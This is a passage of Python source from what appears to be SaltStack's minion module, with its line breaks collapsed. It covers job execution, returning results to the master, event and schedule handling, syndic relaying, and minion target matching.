minion_instance.executors.get(name) if executor_class is None: raise SaltInvocationError("Executor '{0}' is not available".format(name)) return executor_class # Get the last one that is function executor executor = get_executor(executors.pop())(opts, data, func, args, kwargs) # Instantiate others from bottom to the top for executor_name in reversed(executors): executor = get_executor(executor_name)(opts, data, executor) return_data = executor.execute() if isinstance(return_data, types.GeneratorType): ind = 0 iret = {} for single in return_data: if isinstance(single, dict) and isinstance(iret, dict): iret.update(single) else: if not iret: iret = [] iret.append(single) tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job') event_data = {'return': single} minion_instance._fire_master(event_data, tag) ind += 1 ret['return'] = iret else: ret['return'] = return_data ret['retcode'] = minion_instance.functions.pack['__context__'].get( 'retcode', 0 ) ret['success'] = True except CommandNotFoundError as exc: msg = 'Command required for \'{0}\' not found'.format( function_name ) log.debug(msg, exc_info=True) ret['return'] = '{0}: {1}'.format(msg, exc) ret['out'] = 'nested' except CommandExecutionError as exc: log.error( 'A command in \'{0}\' had a problem: {1}'.format( function_name, exc ), exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR: {0}'.format(exc) ret['out'] = 'nested' except SaltInvocationError as exc: log.error( 'Problem executing \'{0}\': {1}'.format( function_name, exc ), exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR executing \'{0}\': {1}'.format( function_name, exc ) ret['out'] = 'nested' except TypeError as exc: msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, ) log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = msg ret['out'] = 'nested' except Exception: msg = 'The minion function caused an exception' log.warning(msg, exc_info_on_loglevel=logging.DEBUG) salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data) ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc()) ret['out'] = 'nested' else: ret['return'] = minion_instance.functions.missing_fun_string(function_name) mod_name = function_name.split('.')[0] if mod_name in minion_instance.function_errors: ret['return'] += ' Possible reasons: \'{0}\''.format( minion_instance.function_errors[mod_name] ) ret['success'] = False ret['retcode'] = 254 ret['out'] = 'nested' ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'master_id' in data: ret['master_id'] = data['master_id'] if 'metadata' in data: if isinstance(data['metadata'], dict): ret['metadata'] = data['metadata'] else: log.warning('The metadata parameter must be a dictionary. Ignoring.') minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] ret['id'] = opts['id'] for returner in set(data['ret'].split(',')): try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job {0} {1}'.format( data['jid'], exc ) ) log.error(traceback.format_exc()) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' salt.utils.appendproctitle(data['jid']) # this seems awkward at first, but it's a workaround for Windows # multiprocessing communication. if not minion_instance: minion_instance = cls(opts) ret = { 'return': {}, 'success': {}, } for ind in range(0, len(data['fun'])): ret['success'][data['fun'][ind]] = False try: func = minion_instance.functions[data['fun'][ind]] args, kwargs = load_args_and_kwargs( func, data['arg'][ind], data) ret['return'][data['fun'][ind]] = func(*args, **kwargs) ret['success'][data['fun'][ind]] = True except Exception as exc: trb = traceback.format_exc() log.warning( 'The minion function caused an exception: {0}'.format( exc ) ) ret['return'][data['fun'][ind]] = trb ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'metadata' in data: ret['metadata'] = data['metadata'] minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] for returner in set(data['ret'].split(',')): ret['id'] = opts['id'] try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job {0} {1}'.format( data['jid'], exc ) ) def _return_pub(self, ret, ret_cmd='_return', timeout=60): ''' Return the data from the executed command to the master server ''' jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: {0}'.format(jid)) channel = salt.transport.Channel.factory(self.opts) if ret_cmd == '_syndic_return': load = {'cmd': ret_cmd, 'id': self.opts['id'], 'jid': jid, 'fun': fun, 'arg': ret.get('arg'), 'tgt': ret.get('tgt'), 'tgt_type': ret.get('tgt_type'), 'load': ret.get('__load__')} if '__master_id__' in ret: load['master_id'] = ret['__master_id__'] load['return'] = {} for key, value in six.iteritems(ret): if key.startswith('__'): continue load['return'][key] = value else: load = {'cmd': ret_cmd, 'id': self.opts['id']} for key, value in six.iteritems(ret): load[key] = value if 'out' in ret: if isinstance(ret['out'], six.string_types): load['out'] = ret['out'] else: log.error('Invalid outputter {0}. This is likely a bug.' .format(ret['out'])) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, six.string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled fn_ = os.path.join( self.opts['cachedir'], 'minion_jobs', load['jid'], 'return.p') jdir = os.path.dirname(fn_) if not os.path.isdir(jdir): os.makedirs(jdir) salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret)) try: ret_val = channel.send(load, timeout=timeout) except SaltReqTimeoutError: msg = ('The minion failed to return the job information for job ' '{0}. This is often due to the master being shut down or ' 'overloaded. If the master is running consider increasing ' 'the worker_threads value.').format(jid) log.warn(msg) return '' log.trace('ret_val = {0}'.format(ret_val)) return ret_val def _state_run(self): ''' Execute a state run based on information set in the minion config file ''' if self.opts['startup_states']: data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')} if self.opts['startup_states'] == 'sls': data['fun'] = 'state.sls' data['arg'] = [self.opts['sls_list']] elif self.opts['startup_states'] == 'top': data['fun'] = 'state.top' data['arg'] = [self.opts['top_file']] else: data['fun'] = 'state.highstate' data['arg'] = [] self._handle_decoded_payload(data) def _refresh_grains_watcher(self, refresh_interval_in_minutes): ''' Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion :param refresh_interval_in_minutes: :return: None ''' if '__update_grains' not in self.opts.get('schedule', {}): if 'schedule' not in self.opts: self.opts['schedule'] = {} self.opts['schedule'].update({ '__update_grains': { 'function': 'event.fire', 'args': [{}, 'grains_refresh'], 'minutes': refresh_interval_in_minutes } }) def _fire_master_minion_start(self): # Send an event to the master that the minion is live self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'minion_start' ) # dup name spaced event self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'minion'), ) def module_refresh(self, force_refresh=False, notify=False): ''' Refresh the functions and returners. ''' log.debug('Refreshing modules. Notify={0}'.format(notify)) self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify) self.schedule.functions = self.functions self.schedule.returners = self.returners # TODO: only allow one future in flight at a time? @tornado.gen.coroutine def pillar_refresh(self, force_refresh=False): ''' Refresh the pillar ''' log.debug('Refreshing pillar') try: self.opts['pillar'] = yield salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() except SaltClientError: # Do not exit if a pillar refresh fails. log.error('Pillar data could not be refreshed. ' 'One or more masters may be down!') self.module_refresh(force_refresh) def manage_schedule(self, package): ''' Refresh the functions and returners. ''' tag, data = salt.utils.event.MinionEvent.unpack(package) func = data.get('func', None) name = data.get('name', None) schedule = data.get('schedule', None) where = data.get('where', None) persist = data.get('persist', None) if func == 'delete': self.schedule.delete_job(name, persist) elif func == 'add': self.schedule.add_job(schedule, persist) elif func == 'modify': self.schedule.modify_job(name, schedule, persist, where) elif func == 'enable': self.schedule.enable_schedule() elif func == 'disable': self.schedule.disable_schedule() elif func == 'enable_job': self.schedule.enable_job(name, persist, where) elif func == 'run_job': self.schedule.run_job(name) elif func == 'disable_job': self.schedule.disable_job(name, persist, where) elif func == 'reload': self.schedule.reload(schedule) elif func == 'list': self.schedule.list(where) elif func == 'save_schedule': self.schedule.save_schedule() def manage_beacons(self, package): ''' Manage Beacons ''' tag, data = salt.utils.event.MinionEvent.unpack(package) func = data.get('func', None) name = data.get('name', None) beacon_data = data.get('beacon_data', None) if func == 'add': self.beacons.add_beacon(name, beacon_data) elif func == 'modify': self.beacons.modify_beacon(name, beacon_data) elif func == 'delete': self.beacons.delete_beacon(name) elif func == 'enable': self.beacons.enable_beacons() elif func == 'disable': self.beacons.disable_beacons() elif func == 'enable_beacon': self.beacons.enable_beacon(name) elif func == 'disable_beacon': self.beacons.disable_beacon(name) elif func == 'list': self.beacons.list_beacons() def environ_setenv(self, package): ''' Set the salt-minion main process environment according to the data contained in the minion event data ''' tag, data = salt.utils.event.MinionEvent.unpack(package) environ = data.get('environ', None) if environ is None: return False false_unsets = data.get('false_unsets', False) clear_all = data.get('clear_all', False) import salt.modules.environ as mod_environ return mod_environ.setenv(environ, false_unsets, clear_all) def clean_die(self, signum, frame): ''' Python does not handle the SIGTERM cleanly, if it is signaled exit the minion process cleanly ''' self._running = False exit(0) def _pre_tune(self): ''' Set the minion running flag and issue the appropriate warnings if the minion cannot be started or is already running ''' if self._running is None: self._running = True elif self._running is False: log.error( 'This {0} was scheduled to stop. Not running ' '{0}.tune_in()'.format(self.__class__.__name__) ) return elif self._running is True: log.error( 'This {0} is already running. Not running ' '{0}.tune_in()'.format(self.__class__.__name__) ) return try: log.info( '{0} is starting as user \'{1}\''.format( self.__class__.__name__, salt.utils.get_user() ) ) except Exception as err: # Only windows is allowed to fail here. See #3189. Log as debug in # that case. Else, error. log.log( salt.utils.is_windows() and logging.DEBUG or logging.ERROR, 'Failed to get the user who is starting {0}'.format( self.__class__.__name__ ), exc_info=err ) def _mine_send(self, package): ''' Send mine data to the master ''' channel = salt.transport.Channel.factory(self.opts) load = salt.utils.event.SaltEvent.unpack(package)[1] load['tok'] = self.tok try: ret = channel.send(load) return ret except SaltReqTimeoutError: log.warning('Unable to send mine data to master.') return None @tornado.gen.coroutine def handle_event(self, package): ''' Handle an event from the epull_sock (all local minion events) ''' log.debug('Handling event \'{0}\''.format(package)) if package.startswith('module_refresh'): tag, data = salt.utils.event.MinionEvent.unpack(package) self.module_refresh(notify=data.get('notify', False)) elif package.startswith('pillar_refresh'): yield self.pillar_refresh() elif package.startswith('manage_schedule'): self.manage_schedule(package) elif package.startswith('manage_beacons'): self.manage_beacons(package) elif package.startswith('grains_refresh'): if self.grains_cache != self.opts['grains']: self.pillar_refresh(force_refresh=True) self.grains_cache = self.opts['grains'] elif package.startswith('environ_setenv'): self.environ_setenv(package) elif package.startswith('_minion_mine'): self._mine_send(package) elif package.startswith('fire_master'): tag, data = salt.utils.event.MinionEvent.unpack(package) log.debug('Forwarding master event tag={tag}'.format(tag=data['tag'])) self._fire_master(data['data'], data['tag'], data['events'], data['pretag']) elif package.startswith('__master_disconnected'): tag, data = salt.utils.event.MinionEvent.unpack(package) # if the master disconnect event is for a different master, raise an exception if data['master'] != self.opts['master']: raise Exception() if self.connected: # we are not connected anymore self.connected = False # modify the scheduled job to fire only on reconnect schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master': self.opts['master'], 'connected': False} } self.schedule.modify_job(name='__master_alive', schedule=schedule) log.info('Connection to master {0} lost'.format(self.opts['master'])) if self.opts['master_type'] == 'failover': log.info('Trying to tune in to next master from master-list') # if eval_master finds a new master for us, self.connected # will be True again on successful master authentication self.opts['master'] = self.eval_master(opts=self.opts, failed=True) if self.connected: # re-init the subsystems to work with the new master log.info('Re-initialising subsystems for new ' 'master {0}'.format(self.opts['master'])) del self.pub_channel self._connect_master_future = self.connect_master() self.block_until_connected() # TODO: remove self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # update scheduled job to run with the new master addr schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master': self.opts['master'], 'connected': True} } self.schedule.modify_job(name='__master_alive', schedule=schedule) elif package.startswith('__master_connected'): # handle this event only once. otherwise it will pollute the log if not self.connected: log.info('Connection to master {0} re-established'.format(self.opts['master'])) self.connected = True # modify the __master_alive job to only fire, # if the connection is lost again schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master': self.opts['master'], 'connected': True} } self.schedule.modify_job(name='__master_alive', schedule=schedule) elif package.startswith('_salt_error'): tag, data = salt.utils.event.MinionEvent.unpack(package) log.debug('Forwarding salt error event tag={tag}'.format(tag=tag)) self._fire_master(data, tag) def _fallback_cleanups(self): ''' Fallback cleanup routines, attempting to fix leaked processes, threads, etc. ''' # Add an extra fallback in case a forked process leaks through multiprocessing.active_children() # Cleanup Windows threads if not salt.utils.is_windows(): return for thread in self.win_proc: if not thread.is_alive(): thread.join() try: self.win_proc.remove(thread) del thread except (ValueError, NameError): pass # Main Minion Tune In def tune_in(self, start=True): ''' Lock onto the publisher. This is the main event loop for the minion :rtype : None ''' self._pre_tune() # Properly exit if a SIGTERM is signalled signal.signal(signal.SIGTERM, self.clean_die) # start up the event publisher, so we can see events during startup self.event_publisher = salt.utils.event.AsyncEventPublisher( self.opts, self.handle_event, io_loop=self.io_loop, ) log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id'])) if start: self.sync_connect_master() self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() # Make sure to gracefully handle CTRL_LOGOFF_EVENT salt.utils.enable_ctrl_logoff_handler() # On first startup execute a state run if configured to do so self._state_run() loop_interval = self.opts['loop_interval'] try: if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds! if self.opts['grains_refresh_every'] > 1: log.debug( 'Enabling the grains refresher. Will run every {0} minutes.'.format( self.opts['grains_refresh_every']) ) else: # Clean up minute vs. minutes in log message log.debug( 'Enabling the grains refresher. Will run every {0} minute.'.format( self.opts['grains_refresh_every']) ) self._refresh_grains_watcher( abs(self.opts['grains_refresh_every']) ) except Exception as exc: log.error( 'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format( exc) ) self.periodic_callbacks = {} # schedule the stuff that runs every interval ping_interval = self.opts.get('ping_interval', 0) * 60 if ping_interval > 0: def ping_master(): if not self._fire_master('ping', 'minion_ping'): if not self.opts.get('auth_safemode', True): log.error('** Master Ping failed. Attempting to restart minion**') delay = self.opts.get('random_reauth_delay', 5) log.info('delaying random_reauth_delay {0}s'.format(delay)) # regular sys.exit raises an exception -- which isn't sufficient in a thread os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE) self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop) self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop) def handle_beacons(): # Process Beacons try: beacons = self.process_beacons(self.functions) except Exception: log.critical('The beacon errored: ', exc_info=True) if beacons: self._fire_master(events=beacons) self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop) # TODO: actually listen to the return and change period def handle_schedule(): self.process_schedule(self, loop_interval) self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop) # start all the other callbacks for periodic_cb in six.itervalues(self.periodic_callbacks): periodic_cb.start() # add handler to subscriber self.pub_channel.on_recv(self._handle_payload) if start: self.io_loop.start() def _handle_payload(self, payload): if payload is not None and self._target_load(payload['load']): self._handle_decoded_payload(payload['load']) def _target_load(self, load): # Verify that the publication is valid if 'tgt' not in load or 'jid' not in load or 'fun' not in load \ or 'arg' not in load: return False # Verify that the publication applies to this minion # It's important to note that the master does some pre-processing # to determine which minions to send a request to. So for example, # a "salt -G 'grain_key:grain_val' test.ping" will invoke some # pre-processing on the master and this minion should not see the # publication if the master does not determine that it should. if 'tgt_type' in load: match_func = getattr(self.matcher, '{0}_match'.format(load['tgt_type']), None) if match_func is None: return False if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'): delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM) if not match_func(load['tgt'], delimiter=delimiter): return False elif not match_func(load['tgt']): return False else: if not self.matcher.glob_match(load['tgt']): return False return True def destroy(self): ''' Tear down the minion ''' self._running = False if hasattr(self, 'pub_channel'): self.pub_channel.on_recv(None) del self.pub_channel if hasattr(self, 'periodic_callbacks'): for cb in six.itervalues(self.periodic_callbacks): cb.stop() def __del__(self): self.destroy() class Syndic(Minion): ''' Make a Syndic minion, this minion will use the minion keys on the master to authenticate with a higher level master. ''' def __init__(self, opts, **kwargs): self._syndic_interface = opts.get('interface') self._syndic = True # force auth_safemode True because Syndic don't support autorestart opts['auth_safemode'] = True opts['loop_interval'] = 1 super(Syndic, self).__init__(opts, **kwargs) self.mminion = salt.minion.MasterMinion(opts) self.jid_forward_cache = set() def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' # TODO: even do this?? data['to'] = int(data.get('to', self.opts['timeout'])) - 1 # Only forward the command if it didn't originate from ourselves if data.get('master_id', 0) != self.opts.get('master_id', 1): self.syndic_cmd(data) def syndic_cmd(self, data): ''' Take the now clear load and forward it on to the client cmd ''' # Set up default tgt_type if 'tgt_type' not in data: data['tgt_type'] = 'glob' kwargs = {} # optionally add a few fields to the publish data for field in ('master_id', # which master the job came from 'user', # which user ran the job ): if field in data: kwargs[field] = data[field] try: # Send out the publication self.local.pub(data['tgt'], data['fun'], data['arg'], data['tgt_type'], data['ret'], data['jid'], data['to'], **kwargs) except Exception as exc: log.warning('Unable to forward pub data: {0}'.format(exc)) def _fire_master_syndic_start(self): # Send an event to the master that the minion is live self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'syndic_start' ) self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'syndic'), ) # Syndic Tune In def tune_in(self, start=True): ''' Lock onto the publisher. This is the main event loop for the syndic ''' signal.signal(signal.SIGTERM, self.clean_die) log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id'])) if start: self.sync_connect_master() # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) self.local.event.subscribe('') self.local.opts['interface'] = self._syndic_interface # add handler to subscriber self.pub_channel.on_recv(self._process_cmd_socket) # register the event sub to the poller self._reset_event_aggregation() self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop) self.local_event_stream.on_recv(self._process_event) # forward events every syndic_event_forward_timeout self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events, self.opts['syndic_event_forward_timeout'] * 1000, io_loop=self.io_loop) self.forward_events.start() # Send an event to the master that the minion is live self._fire_master_syndic_start() # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() if start: self.io_loop.start() # TODO: clean up docs def tune_in_no_block(self): ''' Executes the tune_in sequence but omits extra logging and the management of the event bus assuming that these are handled outside the tune_in sequence ''' # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) # add handler to subscriber self.pub_channel.on_recv(self._process_cmd_socket) def _process_cmd_socket(self, payload): if payload is not None: log.trace('Handling payload') self._handle_decoded_payload(payload['load']) def _reset_event_aggregation(self): self.jids = {} self.raw_events = [] def _process_event(self, raw): # TODO: cleanup: Move down into event class raw = raw[0] mtag, data = self.local.event.unpack(raw, self.local.event.serial) event = {'data': data, 'tag': mtag} log.trace('Got event {0}'.format(event['tag'])) tag_parts = event['tag'].split('/') if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \ salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \ 'return' in event['data']: if 'jid' not in event['data']: # Not a job return return jdict = self.jids.setdefault(event['tag'], {}) if not jdict: jdict['__fun__'] = event['data'].get('fun') jdict['__jid__'] = event['data']['jid'] jdict['__load__'] = {} fstr = '{0}.get_load'.format(self.opts['master_job_cache']) # Only need to forward each load once. Don't hit the disk # for every minion return! if event['data']['jid'] not in self.jid_forward_cache: jdict['__load__'].update( self.mminion.returners[fstr](event['data']['jid']) ) self.jid_forward_cache.add(event['data']['jid']) if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']: # Pop the oldest jid from the cache tmp = sorted(list(self.jid_forward_cache)) tmp.pop(0) self.jid_forward_cache = set(tmp) if 'master_id' in event['data']: # __'s to make sure it doesn't print out on the master cli jdict['__master_id__'] = event['data']['master_id'] jdict[event['data']['id']] = event['data']['return'] else: # Add generic event aggregation here if 'retcode' not in event['data']: self.raw_events.append(event) def _forward_events(self): log.trace('Forwarding events') if self.raw_events: self._fire_master(events=self.raw_events, pretag=tagify(self.opts['id'], base='syndic'), ) for jid in self.jids: self._return_pub(self.jids[jid], '_syndic_return', timeout=self._return_retry_timer()) self._reset_event_aggregation() def destroy(self): ''' Tear down the syndic minion ''' # We borrowed the local clients poller so give it back before # it's destroyed. Reset the local poller reference. super(Syndic, self).destroy() if hasattr(self, 'local'): del self.local if hasattr(self, 'forward_events'): self.forward_events.stop() # TODO: consolidate syndic classes together? # need a way of knowing if the syndic connection is busted class MultiSyndic(MinionBase): ''' Make a MultiSyndic minion, this minion will handle relaying jobs and returns from all minions connected to it to the list of masters it is connected to. Modes (controlled by `syndic_mode`: sync: This mode will synchronize all events and publishes from higher level masters cluster: This mode will only sync job publishes and returns Note: jobs will be returned best-effort to the requesting master. This also means (since we are using zmq) that if a job was fired and the master disconnects between the publish and return, that the return will end up in a zmq buffer in this Syndic headed to that original master. In addition, since these classes all seem to use a mix of blocking and non-blocking calls (with varying timeouts along the way) this daemon does not handle failure well, it will (under most circumstances) stall the daemon for ~15s trying to forward events to the down master ''' # time to connect to upstream master SYNDIC_CONNECT_TIMEOUT = 5 SYNDIC_EVENT_TIMEOUT = 5 def __init__(self, opts, io_loop=None): opts['loop_interval'] = 1 super(MultiSyndic, self).__init__(opts) self.mminion = salt.minion.MasterMinion(opts) # sync (old behavior), cluster (only returns and publishes) self.syndic_mode = self.opts.get('syndic_mode', 'sync') self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = self.opts['acceptance_wait_time_max'] self._has_master = threading.Event() self.jid_forward_cache = set() if io_loop is None: zmq.eventloop.ioloop.install() self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop() else: self.io_loop = io_loop def _spawn_syndics(self): ''' Spawn all the coroutines which will sign in the syndics ''' self._syndics = {} # mapping of opts['master'] -> syndic for master in set(self.opts['master']): s_opts = copy.copy(self.opts) s_opts['master'] = master self._syndics[master] = self._connect_syndic(s_opts) @tornado.gen.coroutine def _connect_syndic(self, opts): ''' Create a syndic, and asynchronously connect it to a master ''' last = 0 # never have we signed in auth_wait = opts['acceptance_wait_time'] while True: log.debug('Syndic attempting to connect to {0}'.format(opts['master'])) try: syndic = Syndic(opts, timeout=self.SYNDIC_CONNECT_TIMEOUT, safe=False, io_loop=self.io_loop, ) yield syndic.connect_master() # set up the syndic to handle publishes (specifically not event forwarding) syndic.tune_in_no_block() log.info('Syndic successfully connected to {0}'.format(opts['master'])) break except SaltClientError as exc: log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master'])) last = time.time() if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait yield tornado.gen.sleep(auth_wait) # TODO: log? except KeyboardInterrupt: raise except: # pylint: disable=W0702 log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True) raise tornado.gen.Return(syndic) def _mark_master_dead(self, master): ''' Mark a master as dead. This will start the sign-in routine ''' # if its connected, mark it dead if self._syndics[master].done(): syndic = self._syndics.result() syndic.destroy() self._syndics[master] = self._connect_syndic(syndic.opts) else: log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug? def _call_syndic(self, func, args=(), kwargs=None, master_id=None): ''' Wrapper to call a given func on a syndic, best effort to get the one you asked for ''' if kwargs is None: kwargs = {} for master, syndic_future in self.iter_master_options(master_id): if not syndic_future.done() or syndic_future.exception(): log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id)) continue try: getattr(syndic_future.result(), func)(*args, **kwargs) return except SaltClientError: log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id)) self._mark_master_dead(master) continue log.critical('Unable to call {0} on any masters!'.format(func)) def iter_master_options(self, master_id=None): ''' Iterate (in order) over your options for master ''' masters = list(self._syndics.keys()) shuffle(masters) if master_id not in self._syndics: master_id = masters.pop(0) else: masters.remove(master_id) while True: yield master_id, self._syndics[master_id] if len(masters) == 0: break master_id = masters.pop(0) def _reset_event_aggregation(self): self.jids = {} self.raw_events = [] # Syndic Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the syndic ''' self._spawn_syndics() # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) self.local.event.subscribe('') log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id'])) # register the event sub to the poller self._reset_event_aggregation() self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop) self.local_event_stream.on_recv(self._process_event) # forward events every syndic_event_forward_timeout self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events, self.opts['syndic_event_forward_timeout'] * 1000, io_loop=self.io_loop) self.forward_events.start() # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() self.io_loop.start() def _process_event(self, raw): # TODO: cleanup: Move down into event class raw = raw[0] mtag, data = self.local.event.unpack(raw, self.local.event.serial) event = {'data': data, 'tag': mtag} log.trace('Got event {0}'.format(event['tag'])) tag_parts = event['tag'].split('/') if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \ salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \ 'return' in event['data']: if 'jid' not in event['data']: # Not a job return return if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1): log.debug('Return recieved with matching master_id, not forwarding') return jdict = self.jids.setdefault(event['tag'], {}) if not jdict: jdict['__fun__'] = event['data'].get('fun') jdict['__jid__'] = event['data']['jid'] jdict['__load__'] = {} fstr = '{0}.get_load'.format(self.opts['master_job_cache']) # Only need to forward each load once. Don't hit the disk # for every minion return! if event['data']['jid'] not in self.jid_forward_cache: jdict['__load__'].update( self.mminion.returners[fstr](event['data']['jid']) ) self.jid_forward_cache.add(event['data']['jid']) if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']: # Pop the oldest jid from the cache tmp = sorted(list(self.jid_forward_cache)) tmp.pop(0) self.jid_forward_cache = set(tmp) if 'master_id' in event['data']: # __'s to make sure it doesn't print out on the master cli jdict['__master_id__'] = event['data']['master_id'] jdict[event['data']['id']] = event['data']['return'] else: # TODO: config to forward these? If so we'll have to keep track of who # has seen them # if we are the top level masters-- don't forward all the minion events if self.syndic_mode == 'sync': # Add generic event aggregation here if 'retcode' not in event['data']: self.raw_events.append(event) def _forward_events(self): log.trace('Forwarding events') if self.raw_events: self._call_syndic('_fire_master', kwargs={'events': self.raw_events, 'pretag': tagify(self.opts['id'], base='syndic'), 'timeout': self.SYNDIC_EVENT_TIMEOUT, }, ) for jid, jid_ret in self.jids.items(): self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'), kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT}, master_id=jid_ret.get('__master_id__'), ) self._reset_event_aggregation() class Matcher(object): ''' Use to return the value for matching calls from the master ''' def __init__(self, opts, functions=None): self.opts = opts self.functions = functions def confirm_top(self, match, data, nodegroups=None): ''' Takes the data passed to a top file environment and determines if the data matches this minion ''' matcher = 'compound' if not data: log.error('Received bad data when setting the match from the top ' 'file') return False for item in data: if isinstance(item, dict): if 'match' in item: matcher = item['match'] if hasattr(self, matcher + '_match'): funcname = '{0}_match'.format(matcher) if matcher == 'nodegroup': return getattr(self, funcname)(match, nodegroups) return getattr(self, funcname)(match) else: log.error('Attempting to match with unknown matcher: {0}'.format( matcher )) return False def glob_match(self, tgt): ''' Returns true if the passed glob matches the id ''' if not isinstance(tgt, six.string_types): return False return fnmatch.fnmatch(self.opts['id'], tgt) def pcre_match(self, tgt): ''' Returns true if the passed pcre regex matches ''' return bool(re.match(tgt, self.opts['id'])) def list_match(self, tgt): ''' Determines if this host is on the list ''' if isinstance(tgt, six.string_types): tgt = tgt.split(',') return bool(self.opts['id'] in tgt) def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Reads in the grains glob match ''' log.debug('grains target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for grains match ' 'statement from master') return False return salt.utils.subdict_match( self.opts['grains'], tgt, delimiter=delimiter ) def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM): ''' Matches a grain based on regex ''' log.debug('grains pcre target: {0}'.format(tgt)) if delimiter not in tgt: log.error('Got insufficient arguments for grains pcre match ' 'statement from master') return False return salt.utils.subdict_match(self.opts['grains'], tgt, delimiter=delimiter, regex_match=True) def data_match(self, tgt): ''' Match based on the local data store on the minion ''' if self.functions is None: utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods(self.opts, utils=utils) comps = tgt.split(':') if len(comps) < 2: return False val = 